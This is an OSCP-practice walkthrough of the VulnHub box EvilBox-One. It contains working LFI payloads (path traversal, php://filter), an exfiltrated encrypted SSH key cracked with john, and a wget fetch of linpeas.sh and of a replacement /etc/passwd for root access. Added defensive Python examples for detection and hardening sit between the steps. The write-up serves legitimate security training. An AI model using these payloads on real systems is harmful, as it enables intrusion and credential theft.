OSCP Practice Box | EvilBox-One

admin, 2024-07-18 13:13:39

Stay disciplined and be your best self: one box a day, and everyone is welcome to hold me to it.


1-Environment setup

Target VM download:

https://download.vulnhub.com/evilbox/EvilBox---One.ova

Kali image:

kali-linux-2024.2-virtualbox-amd64

Hypervisor:

Oracle VM VirtualBox 7.0

Network:

Both Kali and the target use the Host-Only network adapter. Start Kali first, then the target. The previous box was assigned the .105 address, so this one gets .106: Kali's IP is 192.168.56.101 and the target's IP is 192.168.56.106.

2-Attacking the box

2-1-Scanning and enumeration

Port scan; for the command see section "6.3 Active Information Gathering" of the "OSCP | Information Gathering" chapter.

sudo nmap -p 1-65535 192.168.56.106
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-17 02:27 EDT
Nmap scan report for 192.168.56.106
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E3:CC:F1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 16.41 seconds

Ports 22 and 80 are open. Service enumeration; for the command see section "6.3 Active Information Gathering" of the "OSCP | Information Gathering" chapter.

sudo nmap -p22,80 -sT -A 192.168.56.106
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-17 02:28 EDT
Nmap scan report for 192.168.56.106
Host is up (0.00050s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:E3:CC:F1 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms 192.168.56.106

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds

Port 22 is SSH, OpenSSH 7.9p1; a search for an exploitable vulnerability in that version turned up nothing.

Port 80 is a web service.

Directory brute-forcing

gobuster dir -u http://192.168.56.106 -w /usr/share/wordlists/dirb/common.txt -t 5
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.106
[+] Method:                  GET
[+] Threads:                 5
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 12]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.106/secret/]
/server-status        (Status: 403) [Size: 279]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Found http://192.168.56.106/secret/; brute-force further inside it.

gobuster dir -u http://192.168.56.106/secret -w /usr/share/wordlists/dirb/common.txt -t 5
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.106/secret
[+] Method:                  GET
[+] Threads:                 5
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 4]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Nothing new; try guessing file extensions such as php, txt and jsp.

gobuster dir -u http://192.168.56.106/secret -w /usr/share/wordlists/dirb/common.txt -t 5 -x php,txt.jsp
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.106/secret
[+] Method:                  GET
[+] Threads:                 5
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt.jsp
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/.hta.txt.jsp         (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.hta.php             (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.txt.jsp    (Status: 403) [Size: 279]
/.htpasswd.txt.jsp    (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/evil.php             (Status: 200) [Size: 0]
/index.html           (Status: 200) [Size: 4]
Progress: 13842 / 13845 (99.98%)
===============================================================
Finished
===============================================================

Found http://192.168.56.106/secret/evil.php. It returns an empty page, so try guessing its parameters.

gobuster fuzz -u http://192.168.56.106/secret/evil.php?FUZZ=../../../../../etc/passwd -w /usr/share/wordlists/dirb/common.txt -t 5 | grep -v "Length=0"
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://192.168.56.106/secret/evil.php?FUZZ=../../../../../etc/passwd
[+] Method:       GET
[+] Threads:      5
[+] Wordlist:     /usr/share/wordlists/dirb/common.txt
[+] User Agent:   gobuster/3.6
[+] Timeout:      10s
===============================================================
Starting gobuster in fuzzing mode
===============================================================
Found: [Status=200] [Length=1398] [Word=command] http://192.168.56.106/secret/evil.php?command=../../../../../etc/passwd
Found: [Status=400] [Length=301] [Word=Documents and Settings] http://192.168.56.106/secret/evil.php?Documents and Settings=../../../../../etc/passwd
Found: [Status=400] [Length=301] [Word=Program Files] http://192.168.56.106/secret/evil.php?Program Files=../../../../../etc/passwd
Found: [Status=400] [Length=301] [Word=reports list] http://192.168.56.106/secret/evil.php?reports list=../../../../../etc/passwd
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Fuzzing parameter names with an empty value gave no result; fuzzing with the value ../../../../../etc/passwd found the parameter command, which suggests file inclusion.

curl http://192.168.56.106/secret/evil.php?command=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
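Seen from the server side, the parameter fuzz above is loud: thousands of requests from one source, each carrying ../../../../../etc/passwd in a query value, followed by the php://filter read. The following is an added example, not part of the writeup, showing detection logic a defender could run over Apache access logs (combined log format is assumed). The log lines are constructed to mirror the requests in this walkthrough, not captured from the box.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache combined log format; only the fields used here are named
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')   # a ".." path segment anywhere in the value
WRAPPER_RE = re.compile(r'^(php|data|expect|phar|zip|file)://', re.IGNORECASE)


def suspicious_values(target):
    """Yield (param, decoded value, reason) for query values that look like inclusion probes."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)   # parse_qsl decoded once; a second pass catches %252e-style double encoding
        if TRAVERSAL_RE.search(decoded):
            yield name, decoded, "path traversal"
        elif WRAPPER_RE.match(decoded):
            yield name, decoded, "php stream wrapper"


def flag_lfi_requests(log_lines):
    """One finding dict per suspicious request; lines that do not parse are skipped."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, value, reason in suspicious_values(m["target"]):
            findings.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                             "param": param, "value": value, "reason": reason})
    return findings


def burst_by_ip(findings, threshold=3):
    """Source IPs with at least `threshold` flagged requests: a parameter fuzz, not a stray probe."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed sample log lines modelled on the requests in the writeup (not captured from the box)
SAMPLE_LOG = [
    '192.168.56.101 - - [17/Jul/2024:02:40:01 -0400] "GET /secret/evil.php?index=../../../../../etc/passwd HTTP/1.1" 200 0 "-" "gobuster/3.6"',
    '192.168.56.101 - - [17/Jul/2024:02:40:01 -0400] "GET /secret/evil.php?command=../../../../../etc/passwd HTTP/1.1" 200 1398 "-" "gobuster/3.6"',
    '192.168.56.101 - - [17/Jul/2024:02:40:02 -0400] "GET /secret/evil.php?command=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1398 "-" "curl/8.8.0"',
    '192.168.56.101 - - [17/Jul/2024:02:41:10 -0400] "GET /secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php HTTP/1.1" 200 92 "-" "curl/8.8.0"',
    '192.168.56.102 - - [17/Jul/2024:02:45:00 -0400] "GET /secret/index.html HTTP/1.1" 200 4 "-" "Mozilla/5.0"',
    '192.168.56.102 - - [17/Jul/2024:02:45:05 -0400] "GET /secret/evil.php?command=help.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = flag_lfi_requests(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["ip"], h["status"], h["reason"], h["param"], "=", h["value"])
    print("fuzzing sources:", burst_by_ip(hits))
```

The status code is kept in each finding because it separates the one hit that worked (200 with a non-zero body) from the misses (200 with size 0, or 400), which is what an analyst triaging the burst wants to see first.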

2-2-Exploitation

Try reading the source of evil.php

curl http://192.168.56.106/secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php | base64 -d
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    92  100    92    0     0   3621      0 --:--:-- --:--:-- --:--:--  3680
<?php
    $filename = $_GET['command'];
    include($filename);
?>

evil.php can be read, but there is no permission to read /var/log/apache2/access.log, and since no cookie ever created a session there is no /var/lib/php/sessions/sess_xxxxxxxxxxxx either, so writing content into a file and then including it is not an option.
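The two lines of evil.php above are the whole vulnerability: include() of an unchecked GET parameter accepts ../ traversal and php:// stream wrappers alike. As an added example, not code from the box, here is the confinement logic a fixed version needs, written in Python so the checks themselves are visible (in PHP the same shape is realpath() plus a prefix test against the document root). The document root /var/www/html/secret and the allowed extensions are assumptions; the function is pure string logic so it runs without the files existing.

```python
import posixpath
from urllib.parse import urlsplit

DOC_ROOT = "/var/www/html/secret"        # assumed document root for the example
ALLOWED_SUFFIXES = (".php", ".html")     # assumed allow-list of includable file types


def resolve_include(requested, base_dir=DOC_ROOT):
    """Return the confined absolute path for `requested`, or None if it must be refused.

    Refused: empty or NUL-containing input, stream wrappers (php://, data:, ...),
    absolute paths, anything that normalises to a location outside base_dir,
    and files whose extension is not on the allow-list.
    """
    if not requested or "\x00" in requested:
        return None
    if urlsplit(requested).scheme:          # "php://filter/...", "data:...", "http://..."
        return None
    if posixpath.isabs(requested):          # "/etc/passwd"
        return None
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, requested))
    if candidate != base and not candidate.startswith(base + "/"):
        return None                         # "../" walked out of the document root
    if not candidate.endswith(ALLOWED_SUFFIXES):
        return None
    return candidate


if __name__ == "__main__":
    # The probe values from the writeup beside a legitimate request
    for value in ("evil.php", "../../../../../etc/passwd",
                  "php://filter/convert.base64-encode/resource=evil.php", "/etc/passwd"):
        print(f"{value!r:60} -> {resolve_include(value)}")
```

Normalising before the prefix test matters: checking the raw string for ".." is bypassable (for example by encoding, or by a path that only escapes after normalisation), whereas comparing the normalised result against the root is not.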

The passwd file shows a user mowree; guess that an SSH private key id_rsa exists in that user's home.

curl http://192.168.56.106/secret/evil.php?command=../../../../../../../../home/mowree/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----

Fix the file permissions, crack the key's passphrase, and log in over SSH with the key.

chmod 600 id_rsa
ssh2john ./id_rsa > hash.txt
john --wordlist=./rockyou.txt hash.txt
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (./id_rsa)
1g 0:00:00:00 DONE (2024-07-17 03:13) 50.00g/s 62400p/s 62400c/s 62400C/s pedro..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
ssh mowree@192.168.56.106 -i id_rsa
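The line "Cost 1 (KDF/cipher ...) is 1" in john's output is why the crack finishes in well under a second: this is a legacy PEM key (Proc-Type/DEK-Info headers), whose 3DES key is derived from the passphrase with a single MD5 pass, so each guess costs one hash. The modern OpenSSH key format instead runs the passphrase through bcrypt for a configurable number of rounds (ssh-keygen -o -a N). As an added example, not part of the writeup, the checker below reads only the headers or leading fields of a private key file and reports which case it is, so a defender can find keys that would fall to the same wordlist attack. The sample keys are constructed: the legacy one reuses the header lines shown above with a placeholder body, and the OpenSSH ones are truncated blobs containing only the leading fields.

```python
import base64
import struct

MAGIC = b"openssh-key-v1\x00"


def _read_string(buf, off):
    """Read one SSH wire-format string (uint32 big-endian length, then bytes) at offset off."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def classify_private_key(pem_text):
    """Report how a private key file protects its secret.

    Returns dict(format, cipher, kdf, rounds, weak). weak is True when the passphrase is
    stretched by a single fast hash (legacy PEM) or when there is no passphrase at all.
    Only headers / leading fields are parsed; no key material is decrypted.
    """
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    header, body = lines[0], lines[1:-1]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        raw = base64.b64decode("".join(body))
        if not raw.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(MAGIC)
        cipher, off = _read_string(raw, off)
        kdf, off = _read_string(raw, off)
        kdf_opts, off = _read_string(raw, off)
        rounds = None
        if kdf == b"bcrypt":                     # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdf_opts, 0)
            (rounds,) = struct.unpack(">I", kdf_opts[o:o + 4])
        return {"format": "openssh-v1", "cipher": cipher.decode(), "kdf": kdf.decode(),
                "rounds": rounds, "weak": kdf != b"bcrypt"}   # kdf "none" = unencrypted
    # Legacy PEM (BEGIN RSA/DSA/EC PRIVATE KEY): encryption is announced by RFC 1421 headers
    dek = next((ln for ln in body if ln.startswith("DEK-Info:")), None)
    if dek is None:
        return {"format": "legacy-pem", "cipher": None, "kdf": None, "rounds": None, "weak": True}
    cipher = dek.split(":", 1)[1].strip().split(",")[0]
    # key = EVP_BytesToKey(MD5, salt = first 8 IV bytes, 1 iteration): one MD5 per guess
    return {"format": "legacy-pem", "cipher": cipher, "kdf": "md5-evp-bytestokey",
            "rounds": 1, "weak": True}


# --- constructed samples (not real keys) ---
# The header lines of an encrypted legacy key as seen in the writeup; the body is a placeholder.
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

PLACEHOLDERBODYPLACEHOLDERBODYPLACEHOLDERBODY
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(b):
    return struct.pack(">I", len(b)) + b


def _openssh_sample(cipher, kdf, rounds=16):
    """Only the leading fields of an openssh-key-v1 blob (constructed, truncated after kdfoptions)."""
    opts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(opts)
    b64 = base64.b64encode(blob).decode()
    wrapped = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{wrapped}\n-----END OPENSSH PRIVATE KEY-----\n"


BCRYPT_SAMPLE = _openssh_sample(b"aes256-ctr", b"bcrypt", rounds=16)
UNENCRYPTED_SAMPLE = _openssh_sample(b"none", b"none")

if __name__ == "__main__":
    for name, key in (("legacy", LEGACY_SAMPLE), ("bcrypt", BCRYPT_SAMPLE), ("none", UNENCRYPTED_SAMPLE)):
        print(name, classify_private_key(key))
```

Run over every id_* file in the home directories you administer, the "weak" flag lists the keys that need regenerating or re-wrapping in the OpenSSH format with a bcrypt round count; the same wordlist that took "unicorn" in zero seconds here would take orders of magnitude longer against bcrypt rounds, and cannot be tried at all if the key is not readable in the first place.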

Got a shell

mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$ cat user.txt 
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

3-Privilege escalation

3-1-Privilege escalation enumeration

Upload and run linpeas.sh; for the commands see section "17.1.3 Automated Enumeration" of the "OSCP | Linux Privilege Escalation" chapter.

cd /tmp
wget http://192.168.56.101/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh

Relevant output

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/etc/passwd
/home/mowree
......

/etc/passwd is writable

3-2-Privilege escalation exploitation

Generate a password hash

openssl passwd -1
Password: 
Verifying - Password: 
$1$PNn5iJ70$RsHGMW9L3NPvjawqMcG411

Modify the root line in /etc/passwd

root:$1$PNn5iJ70$RsHGMW9L3NPvjawqMcG411:0:0:root:/root:/bin/bash

Alternatively, edit the file locally, wget it onto the target to overwrite passwd, and then su to root with the password.

mowree@EvilBoxOne:/tmp$ wget http://192.168.56.101/passwd.txt -O /etc/passwd
--2024-07-17 10:21:22--  http://192.168.56.101/passwd.txt
Conectando con 192.168.56.101:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 1431 (1,4K) [text/plain]
Grabando a: “/etc/passwd”

/etc/passwd                                                100%[========================================================================================================================================>]   1,40K  --.-KB/s    en 0s    

utime(/etc/passwd): Operación no permitida
2024-07-17 10:21:22 (230 MB/s) - “/etc/passwd” guardado [1431/1431]

mowree@EvilBoxOne:/tmp$ su root
Contraseña: 
root@EvilBoxOne:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)
root@EvilBoxOne:/tmp# cat /root/root.txt 
36QtXfdJWvdC0VavlPIApUbDlqTsBM
root@EvilBoxOne:/tmp# 
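The whole escalation rests on two conditions: /etc/passwd is writable by an unprivileged user, and a hash placed in the second field of the root line is honoured by su instead of the entry in /etc/shadow. Both are cheap to audit. The following is an added example, not part of the writeup: a Python check over captured passwd data that flags a writable file mode, hashes stored in passwd rather than shadow, extra UID 0 accounts and empty password fields (the last two are related variants of the same trick, beyond what this box shows). The sample file is constructed, reusing the root line from above; the mode is passed in rather than read, so the audit can run on data copied from another host.

```python
import stat

SHADOW_MARKERS = ("x", "*", "!", "!!")   # values that mean "no hash here, see shadow / locked"


def parse_passwd(text):
    """Parse passwd-format text; returns (entries, malformed) where malformed holds (lineno, line)."""
    entries, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            malformed.append((lineno, line))
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell})
    return entries, malformed


def audit_passwd(text, mode=None):
    """Findings (list of strings) for passwd contents `text`.

    `mode` is the file's st_mode if known (os.stat("/etc/passwd").st_mode); it is an
    argument rather than read here so the audit can run on data captured elsewhere.
    """
    findings = []
    if mode is not None and mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("file: group- or world-writable (expected mode 0644, owned by root)")
    entries, malformed = parse_passwd(text)
    for lineno, line in malformed:
        findings.append(f"line {lineno}: malformed entry {line!r}")
    seen = set()
    for e in entries:
        name, pw = e["name"], e["pw"]
        if name in seen:
            findings.append(f"{name}: duplicate account name")
        seen.add(name)
        if pw == "":
            findings.append(f"{name}: empty password field (no password needed to log in)")
        elif pw not in SHADOW_MARKERS and not pw.startswith(("!", "*")):
            # anything else is a real hash in the world-readable file, and it overrides /etc/shadow
            findings.append(f"{name}: password hash stored in passwd instead of shadow")
        if e["uid"] == 0 and name != "root":
            findings.append(f"{name}: UID 0 account other than root")
    return findings


# Constructed sample: a trimmed passwd with the root line the writeup injects plus one extra UID 0 user
TAMPERED_PASSWD = """\
root:$1$PNn5iJ70$RsHGMW9L3NPvjawqMcG411:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
toor:x:0:0::/root:/bin/bash
"""

# Constructed sample of a healthy file for comparison
CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit_passwd(TAMPERED_PASSWD, mode=0o100666):   # 0666: the writable case
        print(finding)
```

On a live host the same function can be fed the real file and mode (open("/etc/passwd").read() and os.stat("/etc/passwd").st_mode); running it from configuration management or a file-integrity monitor would have raised the writable-file finding before any attacker needed linpeas to find it.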

Box done.

There are many ways to attack a box; try several and compare notes.

If you know a good box, recommend it via a message to the account.

And if you have your own box write-ups, send them to me via the account to share.

Stay disciplined and be your best self

Originally published on the WeChat official account 高级红队专家: OSCP Practice Box | EvilBox-One

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided only for security research and teaching. Readers who use the information for any other purpose bear full legal and joint liability; this site bears no legal or joint liability. For questions, contact us by e-mail (use a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the home page).
Reproduction must keep this link (CN-SEC中文网, with thanks to the original author for their work):
OSCP Practice Box | EvilBox-One https://cn-sec.com/archives/2968940.html